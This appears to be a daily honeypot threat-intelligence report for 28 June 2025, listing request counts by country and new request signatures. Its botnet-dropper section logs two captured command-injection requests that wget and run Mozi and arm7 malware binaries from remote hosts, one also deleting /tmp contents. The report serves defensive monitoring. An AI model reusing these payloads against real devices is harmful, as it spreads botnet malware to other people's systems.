Table of Contents

Daily Report: 2025-06-28
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 15 new requests that have never been observed before (these were added to the monitored request database.).

A total of 691 requests were recorded during the day, originating from 2 different countries, with a peak of 304 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country

botnet_dropper_behaviour
#

remote_addr	request
61.3.104.188	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.3.104.188:47840/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.83	GET /shell?rm arm7;wget http://141.98.11.83/m/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
97	1	\x00\x0E\x08T\xC5\xAE \xB1\x82p\x10\x00\x00\x00\x00\x00
98	1	\x00\x0E8T\xC5\xAE \xB1\x82p\x10\x00\x00\x00\x00\x00
103	1	\x00\x0E\x08\x859hQ_\xFFX\x9F\x00\x00\x00\x00\x00
106	1	\x00\x0E\x08\xBC\xBE\xDEt\x17&\xC1\xE3\x00\x00\x00\x00\x00
107	1	\x00\x0E\x08\x22\xBC\x98=x\x06\x9D9\x00\x00\x00\x00\x00
108	1	\x00\x0E8\xBC\xBE\xDEt\x17&\xC1\xE3\x00\x00\x00\x00\x00
112	1	\x00\x0E8\x22\xBC\x98=x\x06\x9D9\x00\x00\x00\x00\x00
120	1	\x00\x0E8\x859hQ_\xFFX\x9F\x00\x00\x00\x00\x00
122	1	GET /odinhttpcall1751112573 HTTP/1.1
123	1	GET /OdinHttpCall1751112573 HTTP/1.1
124	1	GET /Odin/http/call1751112573 HTTP/1.1
131	1	\x00\x0E\x08\xF4I\xC7}P\xD2n#\x00\x00\x00\x00\x00
133	1	\x00\x0E8\xF4I\xC7}P\xD2n#\x00\x00\x00\x00\x00
198	1	GET /y9u5 HTTP/1.1
199	1	GET /NnHY HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	304	US
1	53	CN
2	50	BG
3	49	DE
4	37	NL
5	25	JP
6	20	FR
7	18	GB
8	13	SC
9	12	SG
10	12	LT
11	11	HK
12	8	PL
13	7	BR
14	7	BE
15	7	RU
16	6	ZA
17	5	AO
18	5	KR
19	4	MD
20	4	GH
21	4	VN
22	4	IN
23	3	KZ
24	3	IL
25	3	NG
26	2	IE
27	2	SE
28	2	CA
29	2	KW
30	1	PE
31	1	ES
32	1	ID
33	1	BY
34	1	MY
35	1	TH
36	1	PA
37	1	PT
38	1	IT

Report: 2025-06-27

27 June 2025·336 words

Repport Daily

Report: 2025-06-26

26 June 2025·457 words

Repport Daily

Report: 2025-06-25

25 June 2025·318 words

Repport Daily

	number_of_occurence	country_iso_code
0	304	US
1	53	CN
2	50	BG
3	49	DE
4	37	NL
5	25	JP
6	20	FR
7	18	GB
8	13	SC
9	12	SG
10	12	LT
11	11	HK
12	8	PL
13	7	BR
14	7	BE
15	7	RU
16	6	ZA
17	5	AO
18	5	KR
19	4	MD
20	4	GH
21	4	VN
22	4	IN
23	3	KZ
24	3	IL
25	3	NG
26	2	IE
27	2	SE
28	2	CA
29	2	KW
30	1	PE
31	1	ES
32	1	ID
33	1	BY
34	1	MY
35	1	TH
36	1	PA
37	1	PT
38	1	IT

	number_of_occurence	country_iso_code
0	304	US
1	53	CN
2	50	BG
3	49	DE
4	37	NL
5	25	JP
6	20	FR
7	18	GB
8	13	SC
9	12	SG
10	12	LT
11	11	HK
12	8	PL
13	7	BR
14	7	BE
15	7	RU
16	6	ZA
17	5	AO
18	5	KR
19	4	MD
20	4	GH
21	4	VN
22	4	IN
23	3	KZ
24	3	IL
25	3	NG
26	2	IE
27	2	SE
28	2	CA
29	2	KW
30	1	PE
31	1	ES
32	1	ID
33	1	BY
34	1	MY
35	1	TH
36	1	PA
37	1	PT
38	1	IT

Daily Report: 2025-06-28#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-28
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	304	US
1	53	CN
2	50	BG
3	49	DE
4	37	NL
5	25	JP
6	20	FR
7	18	GB
8	13	SC
9	12	SG
10	12	LT
11	11	HK
12	8	PL
13	7	BR
14	7	BE
15	7	RU
16	6	ZA
17	5	AO
18	5	KR
19	4	MD
20	4	GH
21	4	VN
22	4	IN
23	3	KZ
24	3	IL
25	3	NG
26	2	IE
27	2	SE
28	2	CA
29	2	KW
30	1	PE
31	1	ES
32	1	ID
33	1	BY
34	1	MY
35	1	TH
36	1	PA
37	1	PT
38	1	IT